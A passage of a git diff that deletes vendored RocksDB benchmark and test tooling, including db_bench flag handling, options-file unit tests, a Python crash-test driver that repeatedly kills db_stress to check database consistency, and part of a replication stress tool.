-    for (const auto& db_with_cfh : multi_dbs_) {
-      db_with_cfh.db->ResetStats();
-    }
-  }
-
-  void PrintStats(const char* key) {
-    if (db_.db != nullptr) {
-      PrintStats(db_.db, key, false);
-    }
-    for (const auto& db_with_cfh : multi_dbs_) {
-      PrintStats(db_with_cfh.db, key, true);
-    }
-  }
-
-  void PrintStats(DB* db, const char* key, bool print_header = false) {
-    if (print_header) {
-      fprintf(stdout, "\n==== DB: %s ===\n", db->GetName().c_str());
-    }
-    std::string stats;
-    if (!db->GetProperty(key, &stats)) {
-      stats = "(failed)";
-    }
-    fprintf(stdout, "\n%s\n", stats.c_str());
-  }
-};
-
-int db_bench_tool(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  static bool initialized = false;
-  if (!initialized) {
-    SetUsageMessage(std::string("\nUSAGE:\n") + std::string(argv[0]) +
-                    " [OPTIONS]...");
-    initialized = true;
-  }
-  ParseCommandLineFlags(&argc, &argv, true);
-  FLAGS_compaction_style_e = (rocksdb::CompactionStyle) FLAGS_compaction_style;
-#ifndef ROCKSDB_LITE
-  if (FLAGS_statistics && !FLAGS_statistics_string.empty()) {
-    fprintf(stderr,
-            "Cannot provide both --statistics and --statistics_string.\n");
-    exit(1);
-  }
-  if (!FLAGS_statistics_string.empty()) {
-    std::unique_ptr<Statistics> custom_stats_guard;
-    dbstats.reset(NewCustomObject<Statistics>(FLAGS_statistics_string,
-                                              &custom_stats_guard));
-    custom_stats_guard.release();
-    if (dbstats == nullptr) {
-      fprintf(stderr, "No Statistics registered matching string: %s\n",
-              FLAGS_statistics_string.c_str());
-      exit(1);
-    }
-  }
-#endif  // ROCKSDB_LITE
-  if (FLAGS_statistics) {
-    dbstats = rocksdb::CreateDBStatistics();
-  }
-  FLAGS_compaction_pri_e = (rocksdb::CompactionPri)FLAGS_compaction_pri;
-
-  std::vector<std::string> fanout = rocksdb::StringSplit(
-      FLAGS_max_bytes_for_level_multiplier_additional, ',');
-  for (size_t j = 0; j < fanout.size(); j++) {
-    FLAGS_max_bytes_for_level_multiplier_additional_v.push_back(
-#ifndef CYGWIN
-        std::stoi(fanout[j]));
-#else
-        stoi(fanout[j]));
-#endif
-  }
-
-  FLAGS_compression_type_e =
-    StringToCompressionType(FLAGS_compression_type.c_str());
-
-#ifndef ROCKSDB_LITE
-  std::unique_ptr<Env> custom_env_guard;
-  if (!FLAGS_hdfs.empty() && !FLAGS_env_uri.empty()) {
-    fprintf(stderr, "Cannot provide both --hdfs and --env_uri.\n");
-    exit(1);
-  } else if (!FLAGS_env_uri.empty()) {
-    FLAGS_env = NewCustomObject<Env>(FLAGS_env_uri, &custom_env_guard);
-    if (FLAGS_env == nullptr) {
-      fprintf(stderr, "No Env registered for URI: %s\n", FLAGS_env_uri.c_str());
-      exit(1);
-    }
-  }
-#endif  // ROCKSDB_LITE
-  if (!FLAGS_hdfs.empty()) {
-    FLAGS_env  = new rocksdb::HdfsEnv(FLAGS_hdfs);
-  }
-
-  if (!strcasecmp(FLAGS_compaction_fadvice.c_str(), "NONE"))
-    FLAGS_compaction_fadvice_e = rocksdb::Options::NONE;
-  else if (!strcasecmp(FLAGS_compaction_fadvice.c_str(), "NORMAL"))
-    FLAGS_compaction_fadvice_e = rocksdb::Options::NORMAL;
-  else if (!strcasecmp(FLAGS_compaction_fadvice.c_str(), "SEQUENTIAL"))
-    FLAGS_compaction_fadvice_e = rocksdb::Options::SEQUENTIAL;
-  else if (!strcasecmp(FLAGS_compaction_fadvice.c_str(), "WILLNEED"))
-    FLAGS_compaction_fadvice_e = rocksdb::Options::WILLNEED;
-  else {
-    fprintf(stdout, "Unknown compaction fadvice:%s\n",
-            FLAGS_compaction_fadvice.c_str());
-  }
-
-  FLAGS_rep_factory = StringToRepFactory(FLAGS_memtablerep.c_str());
-
-  // Note options sanitization may increase thread pool sizes according to
-  // max_background_flushes/max_background_compactions/max_background_jobs
-  FLAGS_env->SetBackgroundThreads(FLAGS_num_high_pri_threads,
-                                  rocksdb::Env::Priority::HIGH);
-  FLAGS_env->SetBackgroundThreads(FLAGS_num_bottom_pri_threads,
-                                  rocksdb::Env::Priority::BOTTOM);
-  FLAGS_env->SetBackgroundThreads(FLAGS_num_low_pri_threads,
-                                  rocksdb::Env::Priority::LOW);
-
-  // Choose a location for the test database if none given with --db=<path>
-  if (FLAGS_db.empty()) {
-    std::string default_db_path;
-    rocksdb::Env::Default()->GetTestDirectory(&default_db_path);
-    default_db_path += "/dbbench";
-    FLAGS_db = default_db_path;
-  }
-
-  if (FLAGS_stats_interval_seconds > 0) {
-    // When both are set then FLAGS_stats_interval determines the frequency
-    // at which the timer is checked for FLAGS_stats_interval_seconds
-    FLAGS_stats_interval = 1000;
-  }
-
-  rocksdb::Benchmark benchmark;
-  benchmark.Run();
-  return 0;
-}
-}  // namespace rocksdb
-#endif
diff --git a/thirdparty/rocksdb/tools/db_bench_tool_test.cc b/thirdparty/rocksdb/tools/db_bench_tool_test.cc
deleted file mode 100644
index 145f329..0000000
--- a/thirdparty/rocksdb/tools/db_bench_tool_test.cc
+++ /dev/null
@@ -1,318 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#include "rocksdb/db_bench_tool.h"
-#include "options/options_parser.h"
-#include "rocksdb/utilities/options_util.h"
-#include "util/random.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-#ifdef GFLAGS
-#include <gflags/gflags.h>
-
-namespace rocksdb {
-namespace {
-static const int kMaxArgCount = 100;
-static const size_t kArgBufferSize = 100000;
-}  // namespace
-
-class DBBenchTest : public testing::Test {
- public:
-  DBBenchTest() : rnd_(0xFB) {
-    test_path_ = test::TmpDir() + "/db_bench_test";
-    Env::Default()->CreateDir(test_path_);
-    db_path_ = test_path_ + "/db";
-    wal_path_ = test_path_ + "/wal";
-  }
-
-  ~DBBenchTest() {
-    //  DestroyDB(db_path_, Options());
-  }
-
-  void ResetArgs() {
-    argc_ = 0;
-    cursor_ = 0;
-    memset(arg_buffer_, 0, kArgBufferSize);
-  }
-
-  void AppendArgs(const std::vector<std::string>& args) {
-    for (const auto& arg : args) {
-      ASSERT_LE(cursor_ + arg.size() + 1, kArgBufferSize);
-      ASSERT_LE(argc_ + 1, kMaxArgCount);
-      snprintf(arg_buffer_ + cursor_, arg.size() + 1, "%s", arg.c_str());
-
-      argv_[argc_++] = arg_buffer_ + cursor_;
-      cursor_ += arg.size() + 1;
-    }
-  }
-
-  void RunDbBench(const std::string& options_file_name) {
-    AppendArgs({"./db_bench", "--benchmarks=fillseq", "--use_existing_db=0",
-                "--num=1000",
-                std::string(std::string("--db=") + db_path_).c_str(),
-                std::string(std::string("--wal_dir=") + wal_path_).c_str(),
-                std::string(std::string("--options_file=") + options_file_name)
-                    .c_str()});
-    ASSERT_EQ(0, db_bench_tool(argc(), argv()));
-  }
-
-  void VerifyOptions(const Options& opt) {
-    DBOptions loaded_db_opts;
-    std::vector<ColumnFamilyDescriptor> cf_descs;
-    ASSERT_OK(LoadLatestOptions(db_path_, Env::Default(), &loaded_db_opts,
-                                &cf_descs));
-
-    ASSERT_OK(
-        RocksDBOptionsParser::VerifyDBOptions(DBOptions(opt), loaded_db_opts));
-    ASSERT_OK(RocksDBOptionsParser::VerifyCFOptions(ColumnFamilyOptions(opt),
-                                                    cf_descs[0].options));
-
-    // check with the default rocksdb options and expect failure
-    ASSERT_NOK(
-        RocksDBOptionsParser::VerifyDBOptions(DBOptions(), loaded_db_opts));
-    ASSERT_NOK(RocksDBOptionsParser::VerifyCFOptions(ColumnFamilyOptions(),
-                                                     cf_descs[0].options));
-  }
-
-  char** argv() { return argv_; }
-
-  int argc() { return argc_; }
-
-  std::string db_path_;
-  std::string test_path_;
-  std::string wal_path_;
-
-  char arg_buffer_[kArgBufferSize];
-  char* argv_[kMaxArgCount];
-  int argc_ = 0;
-  int cursor_ = 0;
-  Random rnd_;
-};
-
-namespace {}  // namespace
-
-TEST_F(DBBenchTest, OptionsFile) {
-  const std::string kOptionsFileName = test_path_ + "/OPTIONS_test";
-
-  Options opt;
-  opt.create_if_missing = true;
-  opt.max_open_files = 256;
-  opt.max_background_compactions = 10;
-  opt.arena_block_size = 8388608;
-  ASSERT_OK(PersistRocksDBOptions(DBOptions(opt), {"default"},
-                                  {ColumnFamilyOptions(opt)}, kOptionsFileName,
-                                  Env::Default()));
-
-  // override the following options as db_bench will not take these
-  // options from the options file
-  opt.wal_dir = wal_path_;
-
-  RunDbBench(kOptionsFileName);
-
-  VerifyOptions(opt);
-}
-
-TEST_F(DBBenchTest, OptionsFileUniversal) {
-  const std::string kOptionsFileName = test_path_ + "/OPTIONS_test";
-
-  Options opt;
-  opt.compaction_style = kCompactionStyleUniversal;
-  opt.num_levels = 1;
-  opt.create_if_missing = true;
-  opt.max_open_files = 256;
-  opt.max_background_compactions = 10;
-  opt.arena_block_size = 8388608;
-  ASSERT_OK(PersistRocksDBOptions(DBOptions(opt), {"default"},
-                                  {ColumnFamilyOptions(opt)}, kOptionsFileName,
-                                  Env::Default()));
-
-  // override the following options as db_bench will not take these
-  // options from the options file
-  opt.wal_dir = wal_path_;
-
-  RunDbBench(kOptionsFileName);
-
-  VerifyOptions(opt);
-}
-
-TEST_F(DBBenchTest, OptionsFileMultiLevelUniversal) {
-  const std::string kOptionsFileName = test_path_ + "/OPTIONS_test";
-
-  Options opt;
-  opt.compaction_style = kCompactionStyleUniversal;
-  opt.num_levels = 12;
-  opt.create_if_missing = true;
-  opt.max_open_files = 256;
-  opt.max_background_compactions = 10;
-  opt.arena_block_size = 8388608;
-  ASSERT_OK(PersistRocksDBOptions(DBOptions(opt), {"default"},
-                                  {ColumnFamilyOptions(opt)}, kOptionsFileName,
-                                  Env::Default()));
-
-  // override the following options as db_bench will not take these
-  // options from the options file
-  opt.wal_dir = wal_path_;
-
-  RunDbBench(kOptionsFileName);
-
-  VerifyOptions(opt);
-}
-
-const std::string options_file_content = R"OPTIONS_FILE(
-[Version]
-  rocksdb_version=4.3.1
-  options_file_version=1.1
-
-[DBOptions]
-  wal_bytes_per_sync=1048576
-  delete_obsolete_files_period_micros=0
-  WAL_ttl_seconds=0
-  WAL_size_limit_MB=0
-  db_write_buffer_size=0
-  max_subcompactions=1
-  table_cache_numshardbits=4
-  max_open_files=-1
-  max_file_opening_threads=10
-  max_background_compactions=5
-  use_fsync=false
-  use_adaptive_mutex=false
-  max_total_wal_size=18446744073709551615
-  compaction_readahead_size=0
-  new_table_reader_for_compaction_inputs=false
-  keep_log_file_num=10
-  skip_stats_update_on_db_open=false
-  max_manifest_file_size=18446744073709551615
-  db_log_dir=
-  skip_log_error_on_recovery=false
-  writable_file_max_buffer_size=1048576
-  paranoid_checks=true
-  is_fd_close_on_exec=true
-  bytes_per_sync=1048576
-  enable_thread_tracking=true
-  recycle_log_file_num=0
-  create_missing_column_families=false
-  log_file_time_to_roll=0
-  max_background_flushes=1
-  create_if_missing=true
-  error_if_exists=false
-  delayed_write_rate=1048576
-  manifest_preallocation_size=4194304
-  allow_mmap_reads=false
-  allow_mmap_writes=false
-  use_direct_reads=false
-  use_direct_io_for_flush_and_compaction=false
-  stats_dump_period_sec=600
-  allow_fallocate=true
-  max_log_file_size=83886080
-  random_access_max_buffer_size=1048576
-  advise_random_on_open=true
-
-
-[CFOptions "default"]
-  compaction_filter_factory=nullptr
-  table_factory=BlockBasedTable
-  prefix_extractor=nullptr
-  comparator=leveldb.BytewiseComparator
-  compression_per_level=
-  max_bytes_for_level_base=104857600
-  bloom_locality=0
-  target_file_size_base=10485760
-  memtable_huge_page_size=0
-  max_successive_merges=1000
-  max_sequential_skip_in_iterations=8
-  arena_block_size=52428800
-  target_file_size_multiplier=1
-  source_compaction_factor=1
-  min_write_buffer_number_to_merge=1
-  max_write_buffer_number=2
-  write_buffer_size=419430400
-  max_grandparent_overlap_factor=10
-  max_bytes_for_level_multiplier=10
-  memtable_factory=SkipListFactory
-  compression=kSnappyCompression
-  min_partial_merge_operands=2
-  level0_stop_writes_trigger=100
-  num_levels=1
-  level0_slowdown_writes_trigger=50
-  level0_file_num_compaction_trigger=10
-  expanded_compaction_factor=25
-  soft_rate_limit=0.000000
-  max_write_buffer_number_to_maintain=0
-  verify_checksums_in_compaction=true
-  merge_operator=nullptr
-  memtable_prefix_bloom_bits=0
-  paranoid_file_checks=false
-  inplace_update_num_locks=10000
-  optimize_filters_for_hits=false
-  level_compaction_dynamic_level_bytes=false
-  inplace_update_support=false
-  compaction_style=kCompactionStyleUniversal
-  memtable_prefix_bloom_probes=6
-  purge_redundant_kvs_while_flush=true
-  filter_deletes=false
-  hard_pending_compaction_bytes_limit=0
-  disable_auto_compactions=false
-  compaction_measure_io_stats=false
-
-[TableOptions/BlockBasedTable "default"]
-  format_version=0
-  skip_table_builder_flush=false
-  cache_index_and_filter_blocks=false
-  flush_block_policy_factory=FlushBlockBySizePolicyFactory
-  hash_index_allow_collision=true
-  index_type=kBinarySearch
-  whole_key_filtering=true
-  checksum=kCRC32c
-  no_block_cache=false
-  block_size=32768
-  block_size_deviation=10
-  block_restart_interval=16
-  filter_policy=rocksdb.BuiltinBloomFilter
-)OPTIONS_FILE";
-
-TEST_F(DBBenchTest, OptionsFileFromFile) {
-  const std::string kOptionsFileName = test_path_ + "/OPTIONS_flash";
-  unique_ptr<WritableFile> writable;
-  ASSERT_OK(Env::Default()->NewWritableFile(kOptionsFileName, &writable,
-                                            EnvOptions()));
-  ASSERT_OK(writable->Append(options_file_content));
-  ASSERT_OK(writable->Close());
-
-  DBOptions db_opt;
-  std::vector<ColumnFamilyDescriptor> cf_descs;
-  ASSERT_OK(LoadOptionsFromFile(kOptionsFileName, Env::Default(), &db_opt,
-                                &cf_descs));
-  Options opt(db_opt, cf_descs[0].options);
-
-  opt.create_if_missing = true;
-
-  // override the following options as db_bench will not take these
-  // options from the options file
-  opt.wal_dir = wal_path_;
-
-  RunDbBench(kOptionsFileName);
-
-  VerifyOptions(opt);
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  google::ParseCommandLineFlags(&argc, &argv, true);
-  return RUN_ALL_TESTS();
-}
-
-#else
-
-int main(int argc, char** argv) {
-  printf("Skip db_bench_tool_test as the required library GFLAG is missing.");
-}
-#endif  // #ifdef GFLAGS
diff --git a/thirdparty/rocksdb/tools/db_crashtest.py b/thirdparty/rocksdb/tools/db_crashtest.py
deleted file mode 100644
index d64da7a..0000000
--- a/thirdparty/rocksdb/tools/db_crashtest.py
+++ /dev/null
@@ -1,387 +0,0 @@
-#! /usr/bin/env python
-import os
-import re
-import sys
-import time
-import random
-import logging
-import tempfile
-import subprocess
-import shutil
-import argparse
-
-# params overwrite priority:
-#   for default:
-#       default_params < blackbox|whitebox_default_params < args
-#   for simple:
-#       simple_default_params < blackbox|whitebox_simple_default_params < args
-
-default_params = {
-    "block_size": 16384,
-    "cache_size": 1048576,
-    "use_clock_cache": "false",
-    "delpercent": 5,
-    "destroy_db_initially": 0,
-    "disable_wal": 0,
-    "allow_concurrent_memtable_write": 0,
-    "iterpercent": 10,
-    "max_background_compactions": 20,
-    "max_bytes_for_level_base": 10485760,
-    "max_key": 100000000,
-    "max_write_buffer_number": 3,
-    "memtablerep": "prefix_hash",
-    "mmap_read": lambda: random.randint(0, 1),
-    "open_files": 500000,
-    "prefix_size": 7,
-    "prefixpercent": 5,
-    "progress_reports": 0,
-    "readpercent": 45,
-    "reopen": 20,
-    "sync": 0,
-    "target_file_size_base": 2097152,
-    "target_file_size_multiplier": 2,
-    "threads": 32,
-    "verify_checksum": 1,
-    "write_buffer_size": 4 * 1024 * 1024,
-    "writepercent": 35,
-    "log2_keys_per_lock": 2,
-    "subcompactions": lambda: random.randint(1, 4),
-    "use_merge": lambda: random.randint(0, 1),
-    "use_full_merge_v1": lambda: random.randint(0, 1),
-}
-
-
-def get_dbname(test_name):
-    test_tmpdir = os.environ.get("TEST_TMPDIR")
-    if test_tmpdir is None or test_tmpdir == "":
-        dbname = tempfile.mkdtemp(prefix='rocksdb_crashtest_' + test_name)
-    else:
-        dbname = test_tmpdir + "/rocksdb_crashtest_" + test_name
-        shutil.rmtree(dbname, True)
-    return dbname
-
-blackbox_default_params = {
-    # total time for this script to test db_stress
-    "duration": 6000,
-    # time for one db_stress instance to run
-    "interval": 120,
-    # since we will be killing anyway, use large value for ops_per_thread
-    "ops_per_thread": 100000000,
-    "set_options_one_in": 10000,
-    "test_batches_snapshots": 1,
-}
-
-whitebox_default_params = {
-    "duration": 10000,
-    "log2_keys_per_lock": 10,
-    "nooverwritepercent": 1,
-    "ops_per_thread": 200000,
-    "test_batches_snapshots": lambda: random.randint(0, 1),
-    "write_buffer_size": 4 * 1024 * 1024,
-    "subcompactions": lambda: random.randint(1, 4),
-    "random_kill_odd": 888887,
-}
-
-simple_default_params = {
-    "block_size": 16384,
-    "cache_size": 1048576,
-    "use_clock_cache": "false",
-    "column_families": 1,
-    "delpercent": 5,
-    "destroy_db_initially": 0,
-    "disable_wal": 0,
-    "allow_concurrent_memtable_write": lambda: random.randint(0, 1),
-    "iterpercent": 10,
-    "max_background_compactions": 1,
-    "max_bytes_for_level_base": 67108864,
-    "max_key": 100000000,
-    "max_write_buffer_number": 3,
-    "memtablerep": "skip_list",
-    "mmap_read": lambda: random.randint(0, 1),
-    "prefix_size": 0,
-    "prefixpercent": 0,
-    "progress_reports": 0,
-    "readpercent": 50,
-    "reopen": 20,
-    "sync": 0,
-    "target_file_size_base": 16777216,
-    "target_file_size_multiplier": 1,
-    "test_batches_snapshots": 0,
-    "threads": 32,
-    "verify_checksum": 1,
-    "write_buffer_size": 32 * 1024 * 1024,
-    "writepercent": 35,
-    "subcompactions": lambda: random.randint(1, 4),
-}
-
-blackbox_simple_default_params = {
-    "duration": 6000,
-    "interval": 120,
-    "open_files": -1,
-    "ops_per_thread": 100000000,
-    "set_options_one_in": 0,
-    "test_batches_snapshots": 0,
-}
-
-whitebox_simple_default_params = {
-    "duration": 10000,
-    "log2_keys_per_lock": 10,
-    "nooverwritepercent": 1,
-    "open_files": 500000,
-    "ops_per_thread": 200000,
-    "write_buffer_size": 32 * 1024 * 1024,
-    "subcompactions": lambda: random.randint(1, 4),
-}
-
-
-def finalize_and_sanitize(src_params):
-    dest_params = dict([(k,  v() if callable(v) else v)
-                        for (k, v) in src_params.items()])
-    if dest_params.get("allow_concurrent_memtable_write", 1) == 1:
-        dest_params["memtablerep"] = "skip_list"
-    return dest_params
-
-
-def gen_cmd_params(args):
-    params = {}
-
-    if args.simple:
-        params.update(simple_default_params)
-        if args.test_type == 'blackbox':
-            params.update(blackbox_simple_default_params)
-        if args.test_type == 'whitebox':
-            params.update(whitebox_simple_default_params)
-
-    if not args.simple:
-        params.update(default_params)
-        if args.test_type == 'blackbox':
-            params.update(blackbox_default_params)
-        if args.test_type == 'whitebox':
-            params.update(whitebox_default_params)
-
-    for k, v in vars(args).items():
-        if v is not None:
-            params[k] = v
-    return params
-
-
-def gen_cmd(params):
-    cmd = ['./db_stress'] + [
-        '--{0}={1}'.format(k, v)
-        for k, v in finalize_and_sanitize(params).items()
-        if k not in set(['test_type', 'simple', 'duration', 'interval',
-                         'random_kill_odd'])
-        and v is not None]
-    return cmd
-
-
-# This script runs and kills db_stress multiple times. It checks consistency
-# in case of unsafe crashes in RocksDB.
-def blackbox_crash_main(args):
-    cmd_params = gen_cmd_params(args)
-    dbname = get_dbname('blackbox')
-    exit_time = time.time() + cmd_params['duration']
-
-    print("Running blackbox-crash-test with \n"
-          + "interval_between_crash=" + str(cmd_params['interval']) + "\n"
-          + "total-duration=" + str(cmd_params['duration']) + "\n"
-          + "threads=" + str(cmd_params['threads']) + "\n"
-          + "ops_per_thread=" + str(cmd_params['ops_per_thread']) + "\n"
-          + "write_buffer_size=" + str(cmd_params['write_buffer_size']) + "\n"
-          + "subcompactions=" + str(cmd_params['subcompactions']) + "\n")
-
-    while time.time() < exit_time:
-        run_had_errors = False
-        killtime = time.time() + cmd_params['interval']
-
-        cmd = gen_cmd(dict(cmd_params.items() + {'db': dbname}.items()))
-
-        child = subprocess.Popen(cmd, stderr=subprocess.PIPE)
-        print("Running db_stress with pid=%d: %s\n\n"
-              % (child.pid, ' '.join(cmd)))
-
-        stop_early = False
-        while time.time() < killtime:
-            if child.poll() is not None:
-                print("WARNING: db_stress ended before kill: exitcode=%d\n"
-                      % child.returncode)
-                stop_early = True
-                break
-            time.sleep(1)
-
-        if not stop_early:
-            if child.poll() is not None:
-                print("WARNING: db_stress ended before kill: exitcode=%d\n"
-                      % child.returncode)
-            else:
-                child.kill()
-                print("KILLED %d\n" % child.pid)
-                time.sleep(1)  # time to stabilize after a kill
-
-        while True:
-            line = child.stderr.readline().strip()
-            if line != '' and not line.startswith('WARNING'):
-                run_had_errors = True
-                print('stderr has error message:')
-                print('***' + line + '***')
-            else:
-                break
-
-        if run_had_errors:
-            sys.exit(2)
-
-        time.sleep(1)  # time to stabilize before the next run
-
-    # we need to clean up after ourselves -- only do this on test success
-    shutil.rmtree(dbname, True)
-
-
-# This python script runs db_stress multiple times. Some runs with
-# kill_random_test that causes rocksdb to crash at various points in code.
-def whitebox_crash_main(args):
-    cmd_params = gen_cmd_params(args)
-    dbname = get_dbname('whitebox')
-
-    cur_time = time.time()
-    exit_time = cur_time + cmd_params['duration']
-    half_time = cur_time + cmd_params['duration'] / 2
-
-    print("Running whitebox-crash-test with \n"
-          + "total-duration=" + str(cmd_params['duration']) + "\n"
-          + "threads=" + str(cmd_params['threads']) + "\n"
-          + "ops_per_thread=" + str(cmd_params['ops_per_thread']) + "\n"
-          + "write_buffer_size=" + str(cmd_params['write_buffer_size']) + "\n"
-          + "subcompactions=" + str(cmd_params['subcompactions']) + "\n")
-
-    total_check_mode = 4
-    check_mode = 0
-    kill_random_test = cmd_params['random_kill_odd']
-    kill_mode = 0
-
-    while time.time() < exit_time:
-        if check_mode == 0:
-            additional_opts = {
-                # use large ops per thread since we will kill it anyway
-                "ops_per_thread": 100 * cmd_params['ops_per_thread'],
-            }
-            # run with kill_random_test, with three modes.
-            # Mode 0 covers all kill points. Mode 1 covers less kill points but
-            # increases change of triggering them. Mode 2 covers even less
-            # frequent kill points and further increases triggering change.
-            if kill_mode == 0:
-                additional_opts.update({
-                    "kill_random_test": kill_random_test,
-                })
-            elif kill_mode == 1:
-                additional_opts.update({
-                    "kill_random_test": (kill_random_test / 10 + 1),
-                    "kill_prefix_blacklist": "WritableFileWriter::Append,"
-                    + "WritableFileWriter::WriteBuffered",
-                })
-            elif kill_mode == 2:
-                # TODO: May need to adjust random odds if kill_random_test
-                # is too small.
-                additional_opts.update({
-                    "kill_random_test": (kill_random_test / 5000 + 1),
-                    "kill_prefix_blacklist": "WritableFileWriter::Append,"
-                    "WritableFileWriter::WriteBuffered,"
-                    "PosixMmapFile::Allocate,WritableFileWriter::Flush",
-                })
-            # Run kill mode 0, 1 and 2 by turn.
-            kill_mode = (kill_mode + 1) % 3
-        elif check_mode == 1:
-            # normal run with universal compaction mode
-            additional_opts = {
-                "kill_random_test": None,
-                "ops_per_thread": cmd_params['ops_per_thread'],
-                "compaction_style": 1,
-            }
-        elif check_mode == 2:
-            # normal run with FIFO compaction mode
-            # ops_per_thread is divided by 5 because FIFO compaction
-            # style is quite a bit slower on reads with lot of files
-            additional_opts = {
-                "kill_random_test": None,
-                "ops_per_thread": cmd_params['ops_per_thread'] / 5,
-                "compaction_style": 2,
-            }
-        else:
-            # normal run
-            additional_opts = additional_opts = {
-                "kill_random_test": None,
-                "ops_per_thread": cmd_params['ops_per_thread'],
-            }
-
-        cmd = gen_cmd(dict(cmd_params.items() + additional_opts.items()
-                           + {'db': dbname}.items()))
-
-        print "Running:" + ' '.join(cmd) + "\n"
-
-        popen = subprocess.Popen(cmd, stdout=subprocess.PIPE,
-                                 stderr=subprocess.STDOUT)
-        stdoutdata, stderrdata = popen.communicate()
-        retncode = popen.returncode
-        msg = ("check_mode={0}, kill option={1}, exitcode={2}\n".format(
-               check_mode, additional_opts['kill_random_test'], retncode))
-        print msg
-        print stdoutdata
-
-        expected = False
-        if additional_opts['kill_random_test'] is None and (retncode == 0):
-            # we expect zero retncode if no kill option
-            expected = True
-        elif additional_opts['kill_random_test'] is not None and retncode < 0:
-            # we expect negative retncode if kill option was given
-            expected = True
-
-        if not expected:
-            print "TEST FAILED. See kill option and exit code above!!!\n"
-            sys.exit(1)
-
-        stdoutdata = stdoutdata.lower()
-        errorcount = (stdoutdata.count('error') -
-                      stdoutdata.count('got errors 0 times'))
-        print "#times error occurred in output is " + str(errorcount) + "\n"
-
-        if (errorcount > 0):
-            print "TEST FAILED. Output has 'error'!!!\n"
-            sys.exit(2)
-        if (stdoutdata.find('fail') >= 0):
-            print "TEST FAILED. Output has 'fail'!!!\n"
-            sys.exit(2)
-
-        # First half of the duration, keep doing kill test. For the next half,
-        # try different modes.
-        if time.time() > half_time:
-            # we need to clean up after ourselves -- only do this on test
-            # success
-            shutil.rmtree(dbname, True)
-            check_mode = (check_mode + 1) % total_check_mode
-
-        time.sleep(1)  # time to stabilize after a kill
-
-
-def main():
-    parser = argparse.ArgumentParser(description="This script runs and kills \
-        db_stress multiple times")
-    parser.add_argument("test_type", choices=["blackbox", "whitebox"])
-    parser.add_argument("--simple", action="store_true")
-
-    all_params = dict(default_params.items()
-                      + blackbox_default_params.items()
-                      + whitebox_default_params.items()
-                      + simple_default_params.items()
-                      + blackbox_simple_default_params.items()
-                      + whitebox_simple_default_params.items())
-
-    for k, v in all_params.items():
-        parser.add_argument("--" + k, type=type(v() if callable(v) else v))
-    args = parser.parse_args()
-
-    if args.test_type == 'blackbox':
-        blackbox_crash_main(args)
-    if args.test_type == 'whitebox':
-        whitebox_crash_main(args)
-
-if __name__ == '__main__':
-    main()
diff --git a/thirdparty/rocksdb/tools/db_repl_stress.cc b/thirdparty/rocksdb/tools/db_repl_stress.cc
deleted file mode 100644
index fac73c0..0000000
--- a/thirdparty/rocksdb/tools/db_repl_stress.cc
+++ /dev/null
@@ -1,158 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-#ifndef GFLAGS
-#include <cstdio>
-int main() {
-  fprintf(stderr, "Please install gflags to run rocksdb tools\n");
-  return 1;
-}
-#else
-
-#include <cstdio>
-#include <atomic>
-
-#include <gflags/gflags.h>
-
-#include "db/write_batch_internal.h"
-#include "rocksdb/db.h"
-#include "rocksdb/types.h"
-#include "util/testutil.h"
-
-// Run a thread to perform Put's.
-// Another thread uses GetUpdatesSince API to keep getting the updates.
-// options :
-// --num_inserts = the num of inserts the first thread should perform.
-// --wal_ttl = the wal ttl for the run.
-
-using namespace rocksdb;
-
-using GFLAGS::ParseCommandLineFlags;
-using GFLAGS::SetUsageMessage;
-
-struct DataPumpThread {
-  size_t no_records;
-  DB* db; // Assumption DB is Open'ed already.
-};
-
-static std::string RandomString(Random* rnd, int len) {
-  std::string r;
-  test::RandomString(rnd, len, &r);
-  return r;
-}
-
-static void DataPumpThreadBody(void* arg) {
-  DataPumpThread* t = reinterpret_cast<DataPumpThread*>(arg);
-  DB* db = t->db;
-  Random rnd(301);
-  size_t i = 0;
-  while(i++ < t->no_records) {
-    if(!db->Put(WriteOptions(), Slice(RandomString(&rnd, 500)),
-                Slice(RandomString(&rnd, 500))).ok()) {
-      fprintf(stderr, "Error in put\n");
-      exit(1);
-    }
-  }
-}
-
-struct ReplicationThread {
-  std::atomic<bool> stop;
-  DB* db;
-  volatile size_t no_read;
-};
-
-static void ReplicationThreadBody(void* arg) {
-  ReplicationThread* t = reinterpret_cast<ReplicationThread*>(arg);
-  DB* db = t->db;
-  unique_ptr<TransactionLogIterator> iter;
-  SequenceNumber currentSeqNum = 1;
-  while (!t->stop.load(std::memory_order_acquire)) {
-    iter.reset();
-    Status s;
-    while(!db->GetUpdatesSince(currentSeqNum, &iter).ok()) {
-      if (t->stop.load(std::memory_order_acquire)) {
-        return;
-      }
-    }
-    fprintf(stderr, "Refreshing iterator\n");
-    for(;iter->Valid(); iter->Next(), t->no_read++, currentSeqNum++) {
-      BatchResult res = iter->GetBatch();
-      if (res.sequence != currentSeqNum) {
-        fprintf(stderr,
-                "Missed a seq no. b/w %ld and %ld\n",
-                (long)currentSeqNum,
-                (long)res.sequence);
-        exit(1);
-      }
-    }
-  }
-}
-
-DEFINE_uint64(num_inserts, 1000, "the num of inserts the first thread should"
-              " perform.");
-DEFINE_uint64(wal_ttl_seconds, 1000, "the wal ttl for the run(in seconds)");
-DEFINE_uint64(wal_size_limit_MB, 10, "the wal size limit for the run"
-              "(in MB)");
-
-int main(int argc, const char** argv) {
-  SetUsageMessage(
-      std::string("\nUSAGE:\n") + std::string(argv[0]) +
-      " --num_inserts=<num_inserts> --wal_ttl_seconds=<WAL_ttl_seconds>" +
-      " --wal_size_limit_MB=<WAL_size_limit_MB>");
-  ParseCommandLineFlags(&argc, const_cast<char***>(&argv), true);
-
-  Env* env = Env::Default();
-  std::string default_db_path;
-  env->GetTestDirectory(&default_db_path);
-  default_db_path += "db_repl_stress";
-  Options options;
-  options.create_if_missing = true;
